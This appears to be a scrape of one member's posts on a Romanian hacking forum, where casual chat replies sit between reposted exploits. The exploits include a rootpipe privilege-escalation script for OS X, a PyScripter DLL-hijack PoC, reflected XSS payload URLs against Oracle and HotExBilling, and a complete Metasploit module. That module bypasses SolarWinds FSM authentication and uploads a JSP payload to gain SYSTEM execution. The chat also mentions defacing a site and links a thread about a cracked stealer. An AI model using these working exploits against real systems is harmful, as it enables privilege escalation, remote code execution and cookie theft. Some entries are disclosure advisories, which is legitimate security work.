Aerosol

@NBD da-mi emailu sa iti dau invitatie. Da PM sau aici. EDIT: Gata i-am dat eu!

1. in primul rand acest lucru nu este posibil. 2. titlul este inadecvat. 3. ce atatea emoticoane? 4. incearca sa te exprimi cat mai corect d.p.d.v. gramatical. Sfat: nu mai lucra pe incredere cu copii. and @tested se refera la programele de pe google. ( majoritatea, daca nu toate sunt virusi. )

+1 pentru share, un tutorial extrem de interesant. ( ca toate tutorialele postate de tine pana acum ) Tine-o tot asa!

Deci concluzia care este? Se pune in practica ceea ce am zis eu sau nu este ok?

Pornache 100%, daca ai filme bune iese treaba bine.

Salut si bine ai venit!

Nu traiesc pe banii parintilor mei, muncesc ca sa ma intretin. ( oricum nu inteleg ce legatura are raspunsul tau cu topicul meu. )

Dupa ce mi-au trimis mesajul legat de stick-uri m-am gandit la altceva ( asa ca i-am contactat si le-am zis daca imi pot trimite in loc de stick un alt produs de aceasi valoare ) Asa ca s-a facut. Asta da un reward folositor. 1 buc. briceag fluture.

Frumos inceput, bafta in continuare cu proiectul.

Adevarat a inviat! ( Direct din biserica )

######################################################## # # PoC exploit code for rootpipe (CVE-2015-1130) # # Created by Emil Kvarnhammar, TrueSec # # Tested on OS X 10.7.5, 10.8.2, 10.9.5 and 10.10.2 # ######################################################## import os import sys import platform import re import ctypes import objc import sys from Cocoa import NSData, NSMutableDictionary, NSFilePosixPermissions from Foundation import NSAutoreleasePool def load_lib(append_path): return ctypes.cdll.LoadLibrary("/System/Library/PrivateFrameworks/" + append_path); def use_old_api(): return re.match("^(10.7|10.8)(.\d)?$", platform.mac_ver()[0]) args = sys.argv if len(args) != 3: print "usage: exploit.py source_binary dest_binary_as_root" sys.exit(-1) source_binary = args[1] dest_binary = os.path.realpath(args[2]) if not os.path.exists(source_binary): raise Exception("file does not exist!") pool = NSAutoreleasePool.alloc().init() attr = NSMutableDictionary.alloc().init() attr.setValue_forKey_(04777, NSFilePosixPermissions) data = NSData.alloc().initWithContentsOfFile_(source_binary) print "will write file", dest_binary if use_old_api(): adm_lib = load_lib("/Admin.framework/Admin") Authenticator = objc.lookUpClass("Authenticator") ToolLiaison = objc.lookUpClass("ToolLiaison") SFAuthorization = objc.lookUpClass("SFAuthorization") authent = Authenticator.sharedAuthenticator() authref = SFAuthorization.authorization() # authref with value nil is not accepted on OS X <= 10.8 authent.authenticateUsingAuthorizationSync_(authref) st = ToolLiaison.sharedToolLiaison() tool = st.tool() tool.createFileWithContents_path_attributes_(data, dest_binary, attr) else: adm_lib = load_lib("/SystemAdministration.framework/SystemAdministration") WriteConfigClient = objc.lookUpClass("WriteConfigClient") client = WriteConfigClient.sharedClient() client.authenticateUsingAuthorizationSync_(None) tool = client.remoteProxy() tool.createFileWithContents_path_attributes_(data, dest_binary, attr, 0) print "Done!" del pool

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ## Advisory Information Title: FreeBSD 10.x ZFS encryption.key disclosure (CVE-2015-1415) Advisory URL: https://pierrekim.github.io/advisories/CVE-2015-1415.txt.asc Date published: 2015-04-07 Vendors contacted: FreeBSD Release mode: Coordinated release ## Product Description FreeBSD is a UNIX-like operating system. ## Vulnerability Summary FreeBSD 10.x installer supports the installation of FreeBSD 10.x on an encrypted ZFS filesystem by default. When using the encryption system within ZFS during the installation of FreeBSD 10.0 and FreeBSD 10.1, the encryption.key has wrong permissions which allow local users to read this file. Even if the keyfile is passphrase-encrypted, it can present a risk. ## Details By default, the encryption key file is /boot/encryption.key. Instead of being 0600, the permissions are 0644: $ ls -la /boot/encryption.key - -rw-r--r-- 1 root wheel 4096 Feb 17 15:16 /boot/encryption.key $ This file is readable by a local user. ## Vendor Response According to the vendor, a security advisory will be published, describing the problem and the solution. It concerns: - stable/10, 10.1-STABLE - releng/10.1, 10.1-RELEASE-p8 - releng/10.0, 10.0-RELEASE-p18 ## Report Timeline * Mar 01, 2015: Problem found by Pierre Kim * Apr 01, 2015: Vendor is notified of the vulnerability * Apr 01, 2015: Vendor confirms report and indicates a fix is prepared but there will be no security advisory format notification because of the nature of the problem * Apr 02, 2015: Pierre Kim asks a CVE number to the vendor * Apr 02, 2015: Vendor indicates to use CVE-2015-1415 and confirms that a signed notification to the mailing lists will be sent. * Apr 03, 2015: Pierre Kim contacts FreeBSD about the future notification * Apr 04, 2015: Vendor confirms a security advisory will be published next week * Apr 07, 2015: Vendor publishes a security advisory (FreeBSD-SA-15:08) * Apt 07, 2015: This advisory is sent to bugtraq@ ## Credit This vulnerability was found by Pierre Kim (@PierreKimSec). ## References https://www.freebsd.org/doc/handbook/bsdinstall-partitioning.html https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1415 https://www.freebsd.org/security/advisories/FreeBSD-SA-15:08.bsdinstall.asc ## Disclaimer This advisory is licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIcBAEBCAAGBQJVJF22AAoJEMQ+Dtp9ky28NDgP/iW9YALiZKLPVhnShFEhFO4C SvSza1s7LJkhtOH8qOGplzTrn8wSV5BNhwzMaIaKpksP5RjoCkynxvAw/OncazPl tsfHM89m7bQ4puyXF3eb6lMkfaIkxoDAXM5R5DFb2Q+3wg4SDygdM7+BQEdqCXDV 2B+ZNGae2CcsqLq04zjskFgY2bwqNMyX3GbbmUJvVI5IXQIS30e1lVIq8zxcK7u0 lKFlVyp+gdyusenPz0lCqR82Pe1IA3tHuNn2zw3/EudT4VhD789/t/0lEWlSyNg7 uiTCqFpQXnpEnvXEez1gZiDuNccIMXXYv0agB+/mYkkoviQPk5jqCwI5rvs+ppFU IH0gAafqS/UIl5+/dhDdIVDA4+r4WWLUxJfFkDy4ThCQHZtZMCsBYk3/RNJBPDUW JiVZWV8LSSHtYfWj7YoiCswuC9FLp6CT9e+/XQUJjpNrwfpeT5KlFOCFUKQXwV6W 5nUJnQhjVfrXVjeRuOvMCInSwG8DWbfyX75QMmJNyV7aPMrS2prRXbOlTLuQUyzP cJkmToeO4XE4COV+jvtC+c39Booy3r8yp3lfHmz1NXffiv6Ua+11vLamUeYOVPew r4TmionPpSeAx3ODhKEKGjW+HIkl9sx3WcSnEBl88Aqd3Zv77G3ok4usFz4PvPnb /hnH/lhpePtv13jyZpXc =pOPH -----END PGP SIGNATURE----- Source

@M2G cand dai warn / cartonas rosu poti alege tu perioada singur din modcp.

Cred ca orice utilizator a primit la inceput un warn/cartonas rosu. Nu ar fi ok ca acel cartonas sa fie dat pe o perioada de 5/6 lunii maxim un an? Adica ok merita sa fie avertizat dar poate in timp acea persoana isi revizuieste comportamentul. Am vazut ca majoritatea cartonaselor rosii / galbenii sunt date permanent. ( unii mai dau pe 4/5 luni dar foarte rar.) Ar fi foarte ok ideea, e ok si sa se dea permanent daca motivul este unul intemeiat dar la offtopic mai merge. ( asa ii deschizi ochii userului ) Voi ce parere aveti? ( ma refer la membrii in din Staff ) Se mai intampla sa postezi in categoria gresita sau deastea... Ex: eu am luat cateva wanr-uri / cartonase rosii PERMANENTE pentru niste motive minore. gen: categorie gresita / post inutil ( inainte cand mai faceam offtopic ) dar sunt de parere ca orice user se schimba si nu trebuie date permanent. Ex: posturi: https://rstforums.com/forum/94782-bine-ati-primit-un-nou-bun.rst#post598237 https://rstforums.com/forum/94132-vps-gratis.rst#post595448 https://rstforums.com/forum/85118-predator-pain-v11-cracked-fud-logger-crypter-stealer-update-2-a.rst#post578336 https://rstforums.com/forum/91057-user-tepar-filatdegarda.rst#post580293 https://rstforums.com/forum/91066-clubtech-ro.rst#post580367 Eu zic ca ar fi mers pentru 6/7 luni, nu permanent.

@laurwtf, dca tot vroiai sa ii dai deface, bagai un simplu .txt / deface.txt si aia e.

@Que are 20 si ceva de ani... Cartman = LulzCart

Salut si bine ai venit, frumoasa prezentarea ta. Daca ai nevoie de putin ajutor ( in domeniu IT ), daca vrei sa stii de unde sa incepi imi poti lasa PM sa iti dau cateva tutoriale sau pur si simplu sa cauti pe forum.

@DarkAlexutzu ala nu e SQLi omule, e doar o eroare simpla... poate data viitoare.

/* #[+] Author: TUNISIAN CYBER #[+] Exploit Title: PyScriper DLL Hijacking #[+] Date: 05-04-2015 #[+] Type: Local Exploits #[+] Vendor: https://code.google.com/p/pyscripter/ #[+] Tested on: WinXp/Windows 7 Pro #[+] Friendly Sites: sec4ever.com #[+] Twitter: @TCYB3R #[+] gcc -shared -o svrapi.dll dllhijack.c then put svrapi.dll and create a .py file in the same dir, open the .py file , calc.exe execute. Proof of Concept (PoC): ======================= */ #include <windows.h> int tunisian() { WinExec("calc", 0); exit(0); return 0; } BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) { tunisian(); return 0; } Source

###################################################################### # Exploit Title: Oracle.com sub-domain Reflected Cross-Site Scripting (RXSS) # Date: 04/04/2014 # Author: Yann CAM @ Synetis - ASafety # Vendor or Software Link: www.oracle.com # Version: / # Category: Reflected Cross Site Scripting # Google dork: # Tested on: Oracle.com dne sub-domain ###################################################################### Oracle description : ====================================================================== The Oracle Corporation is an American multinational computer technology corporation headquartered in Redwood City, California, United States. The company specializes in developing and marketing computer hardware systems and enterprise software products – particularly its own brands of database management systems. As of 2011, Oracle is the second-largest software maker by revenue, after Microsoft. The company also builds tools for database development and systems of middle-tier software, enterprise resource planning (ERP) software, customer relationship management (CRM) software and supply chain management (SCM) software. Vulnerability description : ====================================================================== A reflected XSS is available in the dne.oracle.com sub-domain. Through this vulnerability, an attacker could tamper with page rendering, redirect victims to fake Oracle portals, or capture Oracle's users credentials such cookies. This reflected XSS is on GET "elq" variable and is not properly sanitized before being used to his page. Proof of Concept : ====================================================================== A non-persistent XSS (RXSS) in "elq" GET param is available in the dne.oracle.com sub-domain during the unsubscribe mailing-list process. Tested on Firefox 33.1.1. Email received through mailing-list contains an "unsubscribe link" in footer. This link points to the dne.oracle.com domain with a token corresponding to the target user (elq GET param). This token isn't properly sanitized before being reused in the page. PoC: https://dne.oracle.com/pls/uns/OPT_OUT.th?elq_mid=5038&sh=&cmid=EMEAFM14042899MPP002C001&l_code=fr&elq=4c31b8602999476b9d88c2e2fb31ff40" /><script>alert(/Reflected XSS - Yann CAM @asafety - www.synetis.com/)</script>&elqCampaignId=5833 Screenshots : ====================================================================== - [url]http://www.asafety.fr/data/20140825-oracle_XSS2.png[/url] Solution: ====================================================================== Fixed by Oracle security team. Additional resources / article and screenshots : ====================================================================== - [url]http://www.oracle.com/[/url] - [url]http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html[/url] - [url]http://www.asafety.fr/vuln-exploit-poc/contribution-oracle-reflected-xss-vulnerabilite[/url] - [url]http://www.synetis.com[/url] Report timeline : ====================================================================== 2014-08-25 : Oracle security team alerted with details and PoC. 2014-10-27 : Oracle response and ack. 2014-10-27 : Confirmation of the fix to Oracle. 2015-04-04 : ASafety public article 2015-04-04 : Public advisory Credits : ====================================================================== 88888888 88 888 88 88 888 88 88 788 Z88 88 88.888888 8888888 888888 88 8888888. 888888. 88 88 888 Z88 88 88 88 88 88 88 8888888 88 88 88 88 88 88 88 88 888 888 88 88 88 88 88888888888 88 88 888888 88 88 88 8. 88 88 88 88 88 888 888 ,88 8I88 88 88 88 88 88 88 .88 .88 ?8888888888. 888 88 88 88888888 8888 88 =88888888 888. 88 88 [url]www.synetis.com[/url] 8888 Consulting firm in management and information security Yann CAM - Security Consultant @ Synetis | ASafety -- SYNETIS | ASafety CONTACT: [url]www.synetis.com[/url] | [url]www.asafety.fr[/url] Source

Title: ==== HotExBilling Manager – Cross-site scripting (XSS) vulnerability Credit: ====== Name: Bhadresh Patel Company/affiliation: HelpAG Website: www.helpag.com CVE: ===== CVE-2015-2781 Date: ==== 12-03-2015 (dd/mm/yyyy) Vendor: ====== Hotspot Express has been in the billing solution business since 1997 in its earlier name EasyBrowsing. Initially, it designed billing solution to address Internet Café. Till today we have more 10000 installations across the globe. Hotspot Express is one of the pioneers of complete WiFi solutions and has been serving for the past 10 years. Be it WiFi hardware from any leading manufacturer or software solutions to secure and manage wired or wireless networks, Hotspot Express has a solution. Whether you are from a big Corporate, SME, Hotel, Resort, Cyber Café, we have a cost effective solution for you. Not just for business alone, we have solution for Universities and colleges too. Product: ======= HotExBilling Manager is an integrated Captive Portal/AAA/Billing software solution from Hotspot Express on LINUX platform. Product link: http://www.hotspotexpress.in/products/hsp.html Abstract: ======= Cross-site scripting vulnerability in the HotEx Billing Manager software enables an anonymous attacker to inject client-side script into Web pages viewed by other users. Report-Timeline: ============ 12-03-2013: Vendor notification 30-03-2013: Vendor notification (No response, Follow-up) 00-00-2013: Vendor Response/Feedback (No response) 00-00-2013: Vendor Fix/Patch (No response) 00-00-2013: Public or Non-Public Disclosure (No response) Affected Version: ============= V73 Exploitation-Technique: =================== Remote Severity Rating: =================== 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N) Details: ======= A Cross-site scripting vulnerability in the HotEx Billing Manager software enables an anonymous attacker to inject client-side script into Web pages viewed by other users. Missing HttpOnly flag in cookie could allow an attacker to steal the document.cookie with successful XSS attack. If the an attacker could hijack the admin user cookie, he could further use it to login to admin portal and can get overall control of the HotEx device, guest accounts and payment details. Vulnerable Module(s): hotspotlogin.cgi Vulnerable Parameter: reply http://<Device IP>/cgi-bin/hotspotlogin.cgi?res=failed&reply=%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e%2c%20Invalid%20username%20or%20Password Caveats / Prerequisites: ====================== No Prerequisites Proof Of Concept: ================ 1) Open below URL after replacing device IP, http://172.1.1.1/cgi-bin/hotspotlogin.cgi?res=failed&reply=%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e%2c%20Invalid%20username%20or%20Password 2) You should get a pop up with document cookie (PHPSESSID) PoC image: http://i62.tinypic.com/2hgwubq.jpg Credits: ======= Bhadresh Patel Security Analyst HelpAG (www.helpag.com) Source

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => "Solarwinds Firewall Security Manager 6.6.5 Client Session Handling Vulnerability", 'Description' => %q{ This module exploits multiple vulnerabilities found in Solarwinds Firewall Security Manager 6.6.5. The first vulnerability is an authentication bypass via the Change Advisor interface due to a user-controlled session.putValue API in userlogin.jsp, allowing the attacker to set the 'username' attribute before authentication. The second problem is that the settings-new.jsp file will only check the 'username' attribute before authorizing the 'uploadFile' action, which can be exploited and allows the attacker to upload a fake xls host list file to the server, and results in arbitrary code execution under the context of SYSTEM. Depending on the installation, by default the Change Advisor web server is listening on port 48080 for an express install. Otherwise, this service may appear on port 8080. Solarwinds has released a fix for this vulnerability as FSM-v6.6.5-HotFix1.zip. You may download it from the module's References section. }, 'License' => MSF_LICENSE, 'Author' => [ 'rgod', # Original discovery 'mr_me <steventhomasseeley[at]gmail.com>', # https://twitter.com/ae0n_ 'sinn3r' # Metasploit ], 'References' => [ ['CVE', '2015-2284'], ['OSVDB', '81634'], ['ZDI', '15-107'], ['URL', 'http://downloads.solarwinds.com/solarwinds/Release/HotFix/FSM-v6.6.5-HotFix1.zip'] ], 'DefaultOptions' => { 'RPORT' => 48080 # Could be 8080 too }, 'Platform' => 'win', 'Targets' => [ ['Solarwinds Firewall Security Manager 6.6.5', {}] ], 'Privileged' => false, 'DisclosureDate' => 'Mar 13 2015', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [ true, 'Base FMS directory path', '/']) ], self.class) end # Returns a checkcode that indicates whether the target is FSM or not def check res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'fsm', 'login.jsp')) if res && res.body =~ /SolarWinds FSM Change Advisor/i return Exploit::CheckCode::Detected end Exploit::CheckCode::Safe end # Exploit/run command def exploit unless check == Exploit::CheckCode::Detected fail_with(Failure::NotVulnerable, 'Target does not appear to be a Solarwinds Firewall Security Manager') end # Stage 1 of the attack # 'admin' is there by default and you can't delete it username = 'admin' print_status("Auth bypass: Putting session value: username=#{username}") sid = put_session_value(username) print_status("Your SID is: #{sid}") # Stage 2 of the attack exe = generate_payload_exe(code: payload.encoded) filename = "#{Rex::Text.rand_text_alpha(5)}.jsp" # Because when we get a shell, we will be at: # C:\Program Files\SolarWinds\SolarWinds FSMServer\webservice # So we have to adjust this filename in order to delete the file register_files_for_cleanup("../plugins/com.lisletech.athena.http.servlets_1.2/jsp/#{filename}") malicious_file = get_jsp_payload(exe, filename) print_status("Uploading file: #{filename} (#{exe.length} bytes)") upload_exec(sid, filename, malicious_file) end private # Returns a write-stager # I grabbed this from Juan's sonicwall_gms_uploaded.rb module def jsp_drop_bin(bin_data, output_file) jspraw = %Q|<%@ page import="java.io.*" %>\n| jspraw << %Q|<%\n| jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n| jspraw << %Q|FileOutputStream outputstream = new FileOutputStream("#{output_file}");\n| jspraw << %Q|int numbytes = data.length();\n| jspraw << %Q|byte[] bytes = new byte[numbytes/2];\n| jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\n| jspraw << %Q|{\n| jspraw << %Q| char char1 = (char) data.charAt(counter);\n| jspraw << %Q| char char2 = (char) data.charAt(counter + 1);\n| jspraw << %Q| int comb = Character.digit(char1, 16) & 0xff;\n| jspraw << %Q| comb <<= 4;\n| jspraw << %Q| comb += Character.digit(char2, 16) & 0xff;\n| jspraw << %Q| bytes[counter/2] = (byte)comb;\n| jspraw << %Q|}\n| jspraw << %Q|outputstream.write(bytes);\n| jspraw << %Q|outputstream.close();\n| jspraw << %Q|%>\n| jspraw end # Returns JSP that executes stuff # This is also from Juan's sonicwall_gms_uploaded.rb module def jsp_execute_command(command) jspraw = %Q|<%@ page import="java.io.*" %>\n| jspraw << %Q|<%\n| jspraw << %Q|try {\n| jspraw << %Q| Runtime.getRuntime().exec("chmod +x #{command}");\n| jspraw << %Q|} catch (IOException ioe) { }\n| jspraw << %Q|Runtime.getRuntime().exec("#{command}");\n| jspraw << %Q|%>\n| jspraw end # Returns a JSP payload def get_jsp_payload(exe, output_file) jsp_drop_bin(exe, output_file) + jsp_execute_command(output_file) end # Creates an arbitrary username by abusing the server's unsafe use of session.putValue def put_session_value(value) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'fsm', 'userlogin.jsp'), 'method' => 'GET', 'vars_get' => { 'username' => value } ) unless res fail_with(Failure::Unknown, 'The connection timed out while setting the session value.') end get_sid(res) end # Returns the session ID def get_sid(res) cookies = res.get_cookies sid = cookies.scan(/(JSESSIONID=\w+);*/).flatten[0] || '' sid end # Uploads a malicious file and then execute it def upload_exec(sid, filename, malicious_file) res = upload_file(sid, filename, malicious_file) if !res fail_with(Failure::Unknown, 'The connection timed out while uploading the malicious file.') elsif res.body.include?('java.lang.NoClassDefFoundError') print_status('Payload being treated as XLS, indicates a successful upload.') else print_status('Unsure of a successful upload.') end print_status('Attempting to execute the payload.') exec_file(sid, filename) end # Uploads a malicious file # By default, the file will be saved at the following location: # C:\Program Files\SolarWinds\SolarWinds FSMServer\plugins\com.lisletech.athena.http.servlets_1.2\reports\tickets\ def upload_file(sid, filename, malicious_file) # Put our payload in: # C:\Program Files\SolarWinds\SolarWinds FSMServer\plugins\com.lisletech.athena.http.servlets_1.2\jsp\ filename = "../../jsp/#{filename}" mime_data = Rex::MIME::Message.new mime_data.add_part(malicious_file, 'application/vnd.ms-excel', nil, "name=\"file\"; filename=\"#{filename}\"") mime_data.add_part('uploadFile', nil, nil, 'name="action"') proto = ssl ? 'https' : 'http' ref = "#{proto}://#{rhost}:#{rport}#{normalize_uri(target_uri.path, 'fsm', 'settings-new.jsp')}" send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'fsm', 'settings-new.jsp'), 'method' => 'POST', 'vars_get' => { 'action' => 'uploadFile' }, 'ctype' => "multipart/form-data; boundary=#{mime_data.bound}", 'data' => mime_data.to_s, 'cookie' => sid, 'headers' => { 'Referer' => ref } ) end # Executes the malicious file and get code execution # We will be at this location: # C:\Program Files\SolarWinds\SolarWinds FSMServer\webservice def exec_file(sid, filename) send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'fsm', filename) ) end # Overrides the original print_status so we make sure we print the rhost and port def print_status(msg) super("#{rhost}:#{rport} - #{msg}") end end Source

@1337 vezi aici o lista destul de mare, unele sunt private nu toate. Siteuri Hack Mai este si asta : ¥akuza112 ~ V3 Linkbase [ World's biggest Linklist for Security and Hacking Boards ]

@rotube esti tanar la 30 auzi la el batran. On:// Bine ai venit.

La multi ani @hate.me win.